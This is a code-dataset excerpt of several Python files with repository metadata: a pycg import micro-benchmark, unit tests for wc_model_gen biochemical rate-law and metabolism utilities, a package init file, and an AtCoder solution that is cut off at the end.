7e599e1f8c1ef3378d64da16dab5091afdb27255 | 59 | py | Python | data/micro-benchmark/imports/chained_import/from_import.py | vitsalis/pycg-evaluation | ce37eb5668465b0c17371914e863d699826447ee | [
"Apache-2.0"
] | 121 | 2020-12-16T20:31:37.000Z | 2022-03-21T20:32:43.000Z | data/micro-benchmark/imports/chained_import/from_import.py | vitsalis/pycg-evaluation | ce37eb5668465b0c17371914e863d699826447ee | [
"Apache-2.0"
] | 24 | 2021-03-13T00:04:00.000Z | 2022-03-21T17:28:11.000Z | data/micro-benchmark/imports/chained_import/from_import.py | vitsalis/pycg-evaluation | ce37eb5668465b0c17371914e863d699826447ee | [
"Apache-2.0"
] | 19 | 2021-03-23T10:58:47.000Z | 2022-03-24T19:46:50.000Z | from chained_import import func1
def func2():
func1()
| 11.8 | 32 | 0.711864 | 8 | 59 | 5.125 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.06383 | 0.20339 | 59 | 4 | 33 | 14.75 | 0.808511 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0e495fa6d3896d9dfdabeba77021e2a589e8e61b | 29,510 | py | Python | tests/test_utils.py | KarrLab/model_generator | b2735391545bcd5f21faaa1ceaa1949e53497378 | [
"MIT"
] | 6 | 2018-12-24T16:20:11.000Z | 2022-01-26T23:38:25.000Z | tests/test_utils.py | KarrLab/model_generator | b2735391545bcd5f21faaa1ceaa1949e53497378 | [
"MIT"
] | 15 | 2018-08-08T20:34:40.000Z | 2021-10-31T20:08:40.000Z | tests/test_utils.py | KarrLab/model_generator | b2735391545bcd5f21faaa1ceaa1949e53497378 | [
"MIT"
] | 2 | 2019-04-05T16:11:57.000Z | 2020-04-29T14:14:30.000Z | """ Tests for utility methods
:Author: Yin Hoon Chew <yinhoon.chew@mssm.edu>
:Date: 2019-02-13
:Copyright: 2019, Karr Lab
:License: MIT
"""
from wc_onto import onto as wc_ontology
from wc_utils.util.units import unit_registry
import wc_model_gen.utils as utils
import math
import scipy.constants
import unittest
import wc_lang
class TestCase(unittest.TestCase):
def test_calc_avg_syn_rate(self):
test_rate = utils.calc_avg_syn_rate(0.5, 300., 36000.)
self.assertAlmostEqual(test_rate, 0.001164872, places=9)
def test_calc_avg_deg_rate(self):
test_rate = utils.calc_avg_deg_rate(0.5, 300.)
self.assertAlmostEqual(test_rate, 0.0011552453009332421, places=16)
def test_test_metabolite_production(self):
model = wc_lang.Model()
submodel = wc_lang.Submodel(model=model, id='metabolism')
compartment = model.compartments.create(id='c')
for i in ['o2', 'h2o', 'atp']:
st = model.species_types.create(id=i)
species = model.species.create(species_type=st, compartment=compartment)
species.id = species.gen_id()
R1 = model.reactions.create(submodel=submodel, id='Ex_o2')
R1.participants.add(model.species.get_one(
id='o2[c]').species_coefficients.get_or_create(coefficient=1.0))
R2 = model.reactions.create(submodel=submodel, id='Ex_h2o')
R2.participants.add(model.species.get_one(
id='h2o[c]').species_coefficients.get_or_create(coefficient=1.0))
R3 = model.reactions.create(submodel=submodel, id='Ex_atp')
R3.participants.add(model.species.get_one(
id='atp[c]').species_coefficients.get_or_create(coefficient=-1.0))
biomass_reaction = model.reactions.create(submodel=submodel, id='biomass_reaction')
biomass_reaction.participants.add(model.species.get_one(
id='o2[c]').species_coefficients.get_or_create(coefficient=-1.0))
biomass_reaction.participants.add(model.species.get_one(
id='h2o[c]').species_coefficients.get_or_create(coefficient=-1.0))
biomass_reaction.participants.add(model.species.get_one(
id='atp[c]').species_coefficients.get_or_create(coefficient=1.0))
submodel.dfba_obj = wc_lang.DfbaObjective(model=model)
submodel.dfba_obj.id = submodel.dfba_obj.gen_id()
obj_expression = biomass_reaction.id
dfba_obj_expression, error = wc_lang.DfbaObjectiveExpression.deserialize(
obj_expression, {wc_lang.Reaction: {biomass_reaction.id: biomass_reaction}})
assert error is None, str(error)
submodel.dfba_obj.expression = dfba_obj_expression
reaction_bounds = {i.id:(0., 1000.) for i in model.reactions}
unproducibles, unrecyclables = utils.test_metabolite_production(submodel, reaction_bounds,
pseudo_reactions=['biomass_reaction'])
self.assertEqual(unproducibles, [])
self.assertEqual(unrecyclables, [])
unproducibles, unrecyclables = utils.test_metabolite_production(submodel, reaction_bounds)
self.assertEqual(unproducibles, [])
self.assertEqual(unrecyclables, [])
mock1 = model.species.create(id='mock1')
mock2 = model.species.create(id='mock2')
biomass_reaction.participants.add(mock1.species_coefficients.get_or_create(coefficient=1.0))
biomass_reaction.participants.add(mock2.species_coefficients.get_or_create(coefficient=-1.0))
unproducibles, unrecyclables = utils.test_metabolite_production(submodel, reaction_bounds)
self.assertEqual(unproducibles, ['mock2'])
self.assertEqual(unrecyclables, ['mock1'])
unproducibles, unrecyclables = utils.test_metabolite_production(submodel, reaction_bounds,
pseudo_reactions=['biomass_reaction'], test_producibles=['mock1'], test_recyclables=['mock2'])
self.assertEqual(unproducibles, ['mock1'])
self.assertEqual(unrecyclables, ['mock2'])
unproducibles, unrecyclables = utils.test_metabolite_production(submodel, reaction_bounds,
test_producibles=['mock1'], test_recyclables=['mock2'])
self.assertEqual(unproducibles, [])
self.assertEqual(unrecyclables, [])
R4 = model.reactions.create(submodel=submodel, id='Ex_mock1')
R4.participants.add(mock1.species_coefficients.get_or_create(coefficient=-1.0))
R5 = model.reactions.create(submodel=submodel, id='Ex_mock2')
R5.participants.add(mock2.species_coefficients.get_or_create(coefficient=1.0))
reaction_bounds = {i.id:(0., 1000.) for i in model.reactions}
unproducibles, unrecyclables = utils.test_metabolite_production(submodel, reaction_bounds)
self.assertEqual(unproducibles, [])
self.assertEqual(unrecyclables, [])
def test_simple_repressor(self):
model = wc_lang.Model()
init_volume = wc_lang.core.InitVolume(distribution=wc_ontology['WC:normal_distribution'], mean=0.5, std=0)
c = wc_lang.Compartment(id='c', init_volume=init_volume)
c.init_density = wc_lang.Parameter(id='density_' + c.id, value=1.)
volume = wc_lang.Function(id='volume_' + c.id)
volume.expression, error = wc_lang.FunctionExpression.deserialize(f'{c.id} / {c.init_density.id}', {
wc_lang.Compartment: {c.id: c},
wc_lang.Parameter: {c.init_density.id: c.init_density},
})
assert error is None, str(error)
tf_species_type = wc_lang.SpeciesType(id='Repressor')
tf_species = wc_lang.Species(species_type=tf_species_type, compartment=c)
tf_species.id = tf_species.gen_id()
wc_lang.DistributionInitConcentration(species=tf_species, mean=0.5)
F_rep, species, parameters, functions = utils.simple_repressor(model, 'transcription_rna1', tf_species)
self.assertEqual(F_rep, '(1 / (1 + Repressor[c] / (Kr_transcription_rna1_Repressor * Avogadro * volume_c)))')
self.assertEqual(species, {'Repressor[c]': tf_species})
self.assertEqual(functions, {'volume_c': volume})
self.assertEqual(set(model.parameters), set(parameters.values()))
self.assertEqual(sorted(list(parameters.keys())), sorted(['Avogadro', 'Kr_transcription_rna1_Repressor']))
self.assertEqual(model.parameters.get_one(id='Kr_transcription_rna1_Repressor').type, None)
self.assertEqual(model.parameters.get_one(id='Kr_transcription_rna1_Repressor').units, unit_registry.parse_units('M'))
def test_simple_activator(self):
model = wc_lang.Model()
init_volume = wc_lang.core.InitVolume(distribution=wc_ontology['WC:normal_distribution'], mean=0.5, std=0)
c = wc_lang.Compartment(id='c', init_volume=init_volume)
c.init_density = wc_lang.Parameter(id='density_' + c.id, value=1.)
volume = wc_lang.Function(id='volume_' + c.id)
volume.expression, error = wc_lang.FunctionExpression.deserialize(f'{c.id} / {c.init_density.id}', {
wc_lang.Compartment: {c.id: c},
wc_lang.Parameter: {c.init_density.id: c.init_density},
})
assert error is None, str(error)
tf_species_type = wc_lang.SpeciesType(id='Activator')
tf_species = wc_lang.Species(species_type=tf_species_type, compartment=c)
tf_species.id = tf_species.gen_id()
wc_lang.DistributionInitConcentration(species=tf_species, mean=0.5)
F_act, species, parameters, functions = utils.simple_activator(model, 'transcription_rna1', tf_species)
self.assertEqual(F_act, '((1 + Activator[c] / (Ka_transcription_rna1_Activator * Avogadro * volume_c) * f_transcription_rna1_Activator) / '
'(1 + Activator[c] / (Ka_transcription_rna1_Activator * Avogadro * volume_c)))')
self.assertEqual(species, {'Activator[c]': tf_species})
self.assertEqual(functions, {'volume_c': volume})
self.assertEqual(set(model.parameters), set(parameters.values()))
self.assertEqual(sorted(list(parameters.keys())), sorted(['Avogadro', 'f_transcription_rna1_Activator', 'Ka_transcription_rna1_Activator']))
self.assertEqual(model.parameters.get_one(id='Ka_transcription_rna1_Activator').type, None)
self.assertEqual(model.parameters.get_one(id='Ka_transcription_rna1_Activator').units, unit_registry.parse_units('M'))
def test_gen_michaelis_menten_like_rate_law(self):
model = wc_lang.Model()
init_volume = wc_lang.core.InitVolume(distribution=wc_ontology['WC:normal_distribution'], mean=0.5, std=0)
c = wc_lang.Compartment(id='c', init_volume=init_volume)
c.init_density = wc_lang.Parameter(id='density_' + c.id, value=1.)
volume = wc_lang.Function(id='volume_' + c.id)
volume.expression, error = wc_lang.FunctionExpression.deserialize(f'{c.id} / {c.init_density.id}', {
wc_lang.Compartment: {c.id: c},
wc_lang.Parameter: {c.init_density.id: c.init_density},
})
assert error is None, str(error)
species_types = {}
species = {}
for i in range(1,7):
Id = 's' + str(i)
species_types[Id] = wc_lang.SpeciesType(id=Id)
species[Id + '[c]'] = wc_lang.Species(species_type=species_types[Id], compartment=c)
species[Id + '[c]'].id = species[Id + '[c]'].gen_id()
wc_lang.DistributionInitConcentration(species=species[Id + '[c]'], mean=0.5)
ob_exp1, error = wc_lang.ObservableExpression.deserialize('s4[c] + s5[c]', {
wc_lang.Species:{species['s4[c]'].gen_id(): species['s4[c]'],
species['s5[c]'].gen_id(): species['s5[c]']}})
assert error is None, str(error)
modifier1 = wc_lang.Observable(id='e1', expression=ob_exp1)
ob_exp2, error = wc_lang.ObservableExpression.deserialize('2 * s6[c]', {
wc_lang.Species:{species['s6[c]'].gen_id(): species['s6[c]']}})
assert error is None, str(error)
modifier2 = wc_lang.Observable(id='e2', expression=ob_exp2)
participant1 = wc_lang.SpeciesCoefficient(species=species['s1[c]'], coefficient=-1)
participant2 = wc_lang.SpeciesCoefficient(species=species['s2[c]'], coefficient=-1)
participant3 = wc_lang.SpeciesCoefficient(species=species['s3[c]'], coefficient=1)
participant4 = wc_lang.SpeciesCoefficient(species=species['s4[c]'], coefficient=-1)
participant5 = wc_lang.SpeciesCoefficient(species=species['s4[c]'], coefficient=1)
participant6 = wc_lang.SpeciesCoefficient(species=species['s6[c]'], coefficient=-1)
participant7 = wc_lang.SpeciesCoefficient(species=species['s6[c]'], coefficient=-1)
participant8 = wc_lang.SpeciesCoefficient(species=species['s6[c]'], coefficient=1)
reaction = wc_lang.Reaction(id='r1', participants=[participant1, participant2, participant3,
participant4, participant5, participant6, participant7, participant8])
rate_law, parameters = utils.gen_michaelis_menten_like_rate_law(
model, reaction, modifiers=[modifier1, modifier2], modifier_reactants=[species['s6[c]']])
self.assertEqual(rate_law.expression, 'k_cat_r1 * e1 * e2 * '
'(s1[c] / (s1[c] + K_m_r1_s1 * Avogadro * volume_c)) * '
'(s2[c] / (s2[c] + K_m_r1_s2 * Avogadro * volume_c)) * '
'(s6[c] / (s6[c] + K_m_r1_s6 * Avogadro * volume_c))')
self.assertEqual(set([i.gen_id() for i in rate_law.species]), set(['s1[c]', 's2[c]', 's6[c]']))
self.assertEqual(set(rate_law.observables), set([modifier1, modifier2]))
self.assertEqual(set(rate_law.parameters), set(parameters))
self.assertEqual(rate_law.parameters.get_one(id='k_cat_r1').type, wc_ontology['WC:k_cat'])
self.assertEqual(rate_law.parameters.get_one(id='k_cat_r1').units, unit_registry.parse_units('s^-1 molecule^-2'))
self.assertEqual(rate_law.parameters.get_one(id='K_m_r1_s2').type, wc_ontology['WC:K_m'])
self.assertEqual(rate_law.parameters.get_one(id='K_m_r1_s2').units, unit_registry.parse_units('M'))
reaction = wc_lang.Reaction(id='r1', participants=[participant1, participant2, participant4, participant8])
rate_law, parameters = utils.gen_michaelis_menten_like_rate_law(
model, reaction)
self.assertEqual(rate_law.expression, 'k_cat_r1 * '
'(s1[c] / (s1[c] + K_m_r1_s1 * Avogadro * volume_c)) * '
'(s2[c] / (s2[c] + K_m_r1_s2 * Avogadro * volume_c)) * '
'(s4[c] / (s4[c] + K_m_r1_s4 * Avogadro * volume_c))')
reaction = wc_lang.Reaction(id='r1', participants=[participant3])
rate_law, parameters = utils.gen_michaelis_menten_like_rate_law(
model, reaction)
self.assertEqual(rate_law.expression, 'k_cat_r1')
reaction = wc_lang.Reaction(id='r1', participants=[participant3, participant6])
rate_law, parameters = utils.gen_michaelis_menten_like_rate_law(
model, reaction, modifiers=[modifier1, species['s6[c]']])
self.assertEqual(rate_law.expression, 'k_cat_r1 * e1 * s6[c]')
reaction = wc_lang.Reaction(id='r1', participants=[participant1, participant2, participant4, participant8])
rate_law, parameters = utils.gen_michaelis_menten_like_rate_law(
model, reaction, exclude_substrates=[species['s1[c]']])
self.assertEqual(rate_law.expression, 'k_cat_r1 * '
'(s2[c] / (s2[c] + K_m_r1_s2 * Avogadro * volume_c)) * '
'(s4[c] / (s4[c] + K_m_r1_s4 * Avogadro * volume_c))')
with self.assertRaises(TypeError) as ctx:
rate_law, parameters = utils.gen_michaelis_menten_like_rate_law(
model, reaction, modifiers=['s6[c]'])
self.assertEqual('The modifiers contain element(s) that is not an observable or a species', str(ctx.exception))
def test_gen_michaelis_menten_like_propensity_function(self):
model = wc_lang.Model()
init_volume = wc_lang.core.InitVolume(distribution=wc_ontology['WC:normal_distribution'], mean=0.5, std=0)
c = wc_lang.Compartment(id='c', init_volume=init_volume)
c.init_density = wc_lang.Parameter(id='density_' + c.id, value=1.)
volume = wc_lang.Function(id='volume_' + c.id)
volume.expression, error = wc_lang.FunctionExpression.deserialize(f'{c.id} / {c.init_density.id}', {
wc_lang.Compartment: {c.id: c},
wc_lang.Parameter: {c.init_density.id: c.init_density},
})
assert error is None, str(error)
species_types = {}
species = {}
for i in range(1,7):
Id = 's' + str(i)
species_types[Id] = wc_lang.SpeciesType(id=Id)
model_species = wc_lang.Species(species_type=species_types[Id], compartment=c)
model_species.id = model_species.gen_id()
species[Id + '_c'] = model_species
wc_lang.DistributionInitConcentration(species=species[Id + '_c'], mean=0.5)
participant1 = wc_lang.SpeciesCoefficient(species=species['s1_c'], coefficient=-1)
participant2 = wc_lang.SpeciesCoefficient(species=species['s2_c'], coefficient=-1)
participant3 = wc_lang.SpeciesCoefficient(species=species['s3_c'], coefficient=-1)
participant4 = wc_lang.SpeciesCoefficient(species=species['s4_c'], coefficient=-1)
participant5 = wc_lang.SpeciesCoefficient(species=species['s5_c'], coefficient=1)
participant6 = wc_lang.SpeciesCoefficient(species=species['s6_c'], coefficient=1)
reaction = wc_lang.Reaction(id='r1', participants=[participant1, participant2, participant3,
participant4, participant5, participant6])
with self.assertRaises(ValueError):
rate_law1, parameters = utils.gen_michaelis_menten_like_propensity_function(
model, reaction)
rate_law2, parameters = utils.gen_michaelis_menten_like_propensity_function(
model, reaction, substrates_as_modifiers=[species['s3_c']])
self.assertEqual(rate_law2.expression, 'k_cat_r1 * s3[c] * '
'(s1[c] / (s1[c] + K_m_r1_s1 * Avogadro * volume_c)) * '
'(s2[c] / (s2[c] + K_m_r1_s2 * Avogadro * volume_c)) * '
'(s4[c] / (s4[c] + K_m_r1_s4 * Avogadro * volume_c))')
self.assertEqual(set([i.gen_id() for i in rate_law2.species]), set(['s1[c]', 's2[c]', 's3[c]', 's4[c]']))
self.assertEqual(set(rate_law2.parameters), set(parameters))
self.assertEqual(rate_law2.parameters.get_one(id='k_cat_r1').type, wc_ontology['WC:k_cat'])
self.assertEqual(rate_law2.parameters.get_one(id='k_cat_r1').units, unit_registry.parse_units('s^-1 molecule^-1'))
self.assertEqual(rate_law2.parameters.get_one(id='K_m_r1_s2').type, wc_ontology['WC:K_m'])
self.assertEqual(rate_law2.parameters.get_one(id='K_m_r1_s2').units, unit_registry.parse_units('M'))
rate_law3, parameters = utils.gen_michaelis_menten_like_propensity_function(
model, reaction, substrates_as_modifiers=[species['s3_c']], exclude_substrates=[species['s1_c']])
self.assertEqual(rate_law3.expression, 'k_cat_r1 * s3[c] * '
'(s2[c] / (s2[c] + K_m_r1_s2 * Avogadro * volume_c)) * '
'(s4[c] / (s4[c] + K_m_r1_s4 * Avogadro * volume_c))')
self.assertEqual(set([i.gen_id() for i in rate_law3.species]), set(['s2[c]', 's3[c]', 's4[c]']))
self.assertEqual(set(rate_law3.parameters), set(parameters))
def test_gen_response_functions(self):
model = wc_lang.Model()
beta = 2
init_volume = wc_lang.core.InitVolume(distribution=wc_ontology['WC:normal_distribution'], mean=0.5, std=0)
c = wc_lang.Compartment(id='c', name='cytosol', init_volume=init_volume)
c.init_density = wc_lang.Parameter(id='density_' + c.id, value=1.)
volume = wc_lang.Function(id='volume_' + c.id)
volume.expression, error = wc_lang.FunctionExpression.deserialize(f'{c.id} / {c.init_density.id}', {
wc_lang.Compartment: {c.id: c},
wc_lang.Parameter: {c.init_density.id: c.init_density},
})
assert error is None, str(error)
reaction = wc_lang.Reaction()
species_types = {}
species = {}
for i in range(1,5):
Id = 's' + str(i)
species_types[Id] = wc_lang.SpeciesType(model=model, id=Id, name='species_type_{}'.format(i))
model_species = wc_lang.Species(model=model, species_type=species_types[Id], compartment=c)
model_species.id = model_species.gen_id()
species[Id + '_c'] = model_species
wc_lang.DistributionInitConcentration(species=species[Id + '_c'], mean=0.5)
factors = [['s1', 'species_type_2'], ['s3'], ['species_type_4']]
factor_exp, all_species, all_parameters, all_volumes, all_observables = utils.gen_response_functions(
model, beta, 'reaction_id', 'reaction_class', c, factors)
self.assertEqual(factor_exp, [
'(reaction_class_factors_c_1 / (reaction_class_factors_c_1 + K_m_reaction_class_reaction_class_factors_c_1 * Avogadro * volume_c))',
'(s3[c] / (s3[c] + K_m_reaction_id_s3 * Avogadro * volume_c))',
'(s4[c] / (s4[c] + K_m_reaction_id_s4 * Avogadro * volume_c))'])
self.assertEqual(all_species, {'s1[c]': species['s1_c'], 's2[c]': species['s2_c'], 's3[c]': species['s3_c'], 's4[c]': species['s4_c']})
self.assertEqual(len(all_parameters), 4)
self.assertEqual(all_parameters['Avogadro'].value, scipy.constants.Avogadro)
self.assertEqual(all_parameters['Avogadro'].units, unit_registry.parse_units('molecule mol^-1'))
self.assertEqual(all_parameters['K_m_reaction_class_reaction_class_factors_c_1'].value, beta * 1. / scipy.constants.Avogadro / c.init_volume.mean)
self.assertEqual(all_parameters['K_m_reaction_class_reaction_class_factors_c_1'].comments, 'The value was assumed to be 2 times the value of reaction_class_factors_c_1')
self.assertEqual(all_parameters['K_m_reaction_id_s3'].value, beta * 0.5 / scipy.constants.Avogadro / c.init_volume.mean)
self.assertEqual(all_parameters['K_m_reaction_id_s4'].type, wc_ontology['WC:K_m'])
self.assertEqual(all_parameters['K_m_reaction_id_s4'].units, unit_registry.parse_units('M'))
self.assertEqual(all_parameters['K_m_reaction_id_s4'].comments, 'The value was assumed to be 2 times the concentration of s4 in cytosol')
self.assertEqual(all_volumes, {'volume_c': volume})
self.assertEqual(len(all_observables), 1)
self.assertEqual(len(model.observables), 1)
self.assertEqual(all_observables['reaction_class_factors_c_1'].name, 'factor for reaction_class in cytosol')
self.assertEqual(all_observables['reaction_class_factors_c_1'].units, unit_registry.parse_units('molecule'))
self.assertEqual(all_observables['reaction_class_factors_c_1'].expression.expression, 's1[c] + s2[c]')
for i in range(5,9):
Id = 's' + str(i)
species_types[Id] = wc_lang.SpeciesType(model=model, id=Id, name='species_type_{}'.format(i))
model_species = wc_lang.Species(model=model, species_type=species_types[Id], compartment=c)
model_species.id = model_species.gen_id()
species[Id + '_c'] = model_species
wc_lang.DistributionInitConcentration(species=species[Id + '_c'], mean=0.)
factors = [['s5', 'species_type_6'], ['s7'], ['species_type_8']]
factor_exp, all_species, all_parameters, all_volumes, all_observables = utils.gen_response_functions(
model, beta, 'reaction_id', 'reaction_class', c, factors)
self.assertEqual(len(model.observables), 2)
self.assertEqual(all_parameters['K_m_reaction_class_reaction_class_factors_c_2'].value, 1e-05)
self.assertEqual(all_parameters['K_m_reaction_class_reaction_class_factors_c_2'].comments,
'The value was assigned to 1e-05 because the value of reaction_class_factors_c_2 was zero')
self.assertEqual(all_parameters['K_m_reaction_id_s7'].value, 1e-05)
self.assertEqual(all_parameters['K_m_reaction_id_s8'].comments, 'The value was assigned to 1e-05 because the concentration of s8 in cytosol was zero')
factors = [['s5', 'species_type_6']]
factor_exp, all_species, all_parameters, all_volumes, all_observables = utils.gen_response_functions(
model, beta, 'reaction_id2', 'reaction_class2', c, factors)
self.assertEqual(len(model.observables), 2)
self.assertEqual(all_parameters['K_m_reaction_class2_reaction_class_factors_c_2'].value, 1e-05)
def test_gen_mass_action_rate_law(self):
model = wc_lang.Model()
c = wc_lang.Compartment(id='c', init_volume=wc_lang.InitVolume(mean=0.5))
c.init_density = wc_lang.Parameter(id='density_' + c.id, value=1.)
kinetic_parameter = wc_lang.Parameter(id='this_parameter', value=1.)
volume = wc_lang.Function(id='volume_' + c.id)
volume.expression, error = wc_lang.FunctionExpression.deserialize(f'{c.id} / {c.init_density.id}', {
wc_lang.Compartment: {c.id: c},
wc_lang.Parameter: {c.init_density.id: c.init_density},
})
assert error is None, str(error)
species_types = {}
species = {}
for i in range(1,7):
Id = 's' + str(i)
species_types[Id] = wc_lang.SpeciesType(id=Id)
species[Id + '_c'] = wc_lang.Species(species_type=species_types[Id], compartment=c)
wc_lang.DistributionInitConcentration(species=species[Id + '_c'], mean=0.5)
Id = 'e'
species_types[Id] = wc_lang.SpeciesType(id=Id)
species[Id + '_c'] = wc_lang.Species(species_type=species_types[Id], compartment=c)
wc_lang.DistributionInitConcentration(species=species[Id + '_c'], mean=0.5)
# ob_exp1, error = wc_lang.ObservableExpression.deserialize('s4[c] + s5[c]', {
# wc_lang.Species:{species['s4_c'].gen_id(): species['s4_c'],
# species['s5_c'].gen_id(): species['s5_c']}})
# assert error is None, str(error)
# modifier1 = wc_lang.Observable(id='e1', expression=ob_exp1)
# ob_exp2, error = wc_lang.ObservableExpression.deserialize('2 * s6[c]', {
# wc_lang.Species:{species['s6_c'].gen_id(): species['s6_c']}})
# assert error is None, str(error)
# modifier2 = wc_lang.Observable(id='e2', expression=ob_exp2)
participant1 = wc_lang.SpeciesCoefficient(species=species['s1_c'], coefficient=-1)
participant2 = wc_lang.SpeciesCoefficient(species=species['s2_c'], coefficient=-1)
participant3 = wc_lang.SpeciesCoefficient(species=species['s3_c'], coefficient=1)
participant4 = wc_lang.SpeciesCoefficient(species=species['s4_c'], coefficient=1)
enzyme_lhs = wc_lang.SpeciesCoefficient(species=species['e_c'], coefficient=-1)
enzyme_rhs = wc_lang.SpeciesCoefficient(species=species['e_c'], coefficient=1)
reaction = wc_lang.Reaction(id='Assosication', participants=[participant1, participant2, participant3])
rate_law, parameters = utils.gen_mass_action_rate_law(model, reaction, kinetic_parameter)
self.assertTrue(rate_law.expression == 'this_parameter * s1[c] * s2[c]' or
rate_law.expression == 'this_parameter * s2[c] * s1[c]')
self.assertEqual(set([i.gen_id() for i in rate_law.species]), set(['s1[c]', 's2[c]']))
# self.assertEqual(set(rate_law.observables), set([modifier1, modifier2]))
self.assertEqual(set(rate_law.parameters), set(parameters))
# self.assertEqual(rate_law.parameters.get_one(id='k_r1').type, wc_ontology['WC:k_cat'])
self.assertEqual(rate_law.parameters.get_one(id='this_parameter').units, unit_registry.parse_units('s^-1 * molecule^-1'))
# self.assertEqual(rate_law.parameters.get_one(id='K_m_r1_s2').type, wc_ontology['WC:K_m'])
# self.assertEqual(rate_law.parameters.get_one(id='K_m_r1_s2').units, unit_registry.parse_units('M'))
reaction = wc_lang.Reaction(id='Dissociation', participants=[participant1, participant3, participant4])
rate_law, parameters = utils.gen_mass_action_rate_law(model, reaction, kinetic_parameter)
self.assertEqual(rate_law.expression, 'this_parameter * s1[c]')
self.assertEqual(set([i.gen_id() for i in rate_law.species]), set(['s1[c]']))
self.assertEqual(rate_law.parameters.get_one(id='this_parameter').units, unit_registry.parse_units('s^-1'))
reaction = wc_lang.Reaction(id='Degradation1', participants=[participant1])
rate_law, parameters = utils.gen_mass_action_rate_law(model, reaction, kinetic_parameter)
self.assertEqual(rate_law.expression, 'this_parameter * s1[c]')
self.assertEqual(set([i.gen_id() for i in rate_law.species]), set(['s1[c]']))
self.assertEqual(rate_law.parameters.get_one(id='this_parameter').units, unit_registry.parse_units('s^-1'))
reaction = wc_lang.Reaction(id='Degradation2', participants=[participant1, enzyme_lhs, enzyme_rhs])
rate_law, parameters = utils.gen_mass_action_rate_law(model, reaction, kinetic_parameter)
self.assertTrue(rate_law.expression, 'this_parameter * s1[c] * e[c]' or
'this_parameter * e[c] * s1[c]')
self.assertEqual(set([i.gen_id() for i in rate_law.species]), set(['s1[c]', 'e[c]']))
self.assertEqual(rate_law.parameters.get_one(id='this_parameter').units, unit_registry.parse_units('s^-1 * molecule^-1'))
reaction = wc_lang.Reaction(id='Synthesis1', participants=[participant3])
rate_law, parameters = utils.gen_mass_action_rate_law(model, reaction, kinetic_parameter)
self.assertEqual(rate_law.expression, 'this_parameter')
self.assertEqual(set([i.gen_id() for i in rate_law.species]), set([]))
self.assertEqual(rate_law.parameters.get_one(id='this_parameter').units, unit_registry.parse_units('s^-1 * molecule'))
reaction = wc_lang.Reaction(id='Synthesis2', participants=[enzyme_lhs, enzyme_rhs, participant3])
rate_law, parameters = utils.gen_mass_action_rate_law(model, reaction, kinetic_parameter)
self.assertEqual(rate_law.expression, 'this_parameter * e[c]')
self.assertEqual(set([i.gen_id() for i in rate_law.species]), set(['e[c]']))
self.assertEqual(rate_law.parameters.get_one(id='this_parameter').units, unit_registry.parse_units('s^-1'))
reaction = wc_lang.Reaction(id='Conversion', participants=[participant1, enzyme_lhs, enzyme_rhs, participant3]) # Ask Yin Hoon why I can add as many copies of participant2 as I want.
rate_law, parameters = utils.gen_mass_action_rate_law(model, reaction, kinetic_parameter)
self.assertTrue(rate_law.expression == 'this_parameter * s1[c] * e[c]' or
rate_law.expression == 'this_parameter * e[c] * s1[c]')
self.assertEqual(set([i.gen_id() for i in rate_law.species]), set(['s1[c]', 'e[c]']))
self.assertEqual(rate_law.parameters.get_one(id='this_parameter').units, unit_registry.parse_units('s^-1 * molecule^-1')) | 59.736842 | 190 | 0.67428 | 3,852 | 29,510 | 4.90135 | 0.068017 | 0.039725 | 0.026112 | 0.026801 | 0.865413 | 0.837341 | 0.80572 | 0.784057 | 0.754661 | 0.719756 | 0 | 0.023302 | 0.188546 | 29,510 | 494 | 191 | 59.736842 | 0.765138 | 0.036733 | 0 | 0.484293 | 0 | 0 | 0.151658 | 0.031965 | 0 | 0 | 0 | 0 | 0.282723 | 1 | 0.02356 | false | 0 | 0.018325 | 0 | 0.044503 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0e6a69372d51e5edb892ba9530a96041d9ac1696 | 82 | py | Python | regression/__init__.py | george-j-zhu/timeseriesprocessing | 5d774a438c5e835a8d5c802009f4d5303388b69d | [
"CC-BY-4.0"
] | 1 | 2018-06-26T05:27:55.000Z | 2018-06-26T05:27:55.000Z | regression/__init__.py | george-j-zhu/timeseriesprocessing | 5d774a438c5e835a8d5c802009f4d5303388b69d | [
"CC-BY-4.0"
] | null | null | null | regression/__init__.py | george-j-zhu/timeseriesprocessing | 5d774a438c5e835a8d5c802009f4d5303388b69d | [
"CC-BY-4.0"
] | null | null | null | from . import timeSeriesDataFrame
from . import constants
from . import utilities
| 20.5 | 33 | 0.817073 | 9 | 82 | 7.444444 | 0.555556 | 0.447761 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.146341 | 82 | 3 | 34 | 27.333333 | 0.957143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0e755c3e59cfea99b2c1bb3b5c46310bfdfa3f04 | 163 | py | Python | ABC/180/A.py | yu9824/AtCoder | 50a209059c005efadc1c912e443ec41365381c16 | [
"MIT"
] | null | null | null | ABC/180/A.py | yu9824/AtCoder | 50a209059c005efadc1c912e443ec41365381c16 | [
"MIT"
] | null | null | null | ABC/180/A.py | yu9824/AtCoder | 50a209059c005efadc1c912e443ec41365381c16 | [
"MIT"
] | null | null | null | # list(map(int, input().split()))
# int(input())
def main():
N, A, B = list(map(int, input().split()))
print(N-A+B)
if __name__ == '__main__':
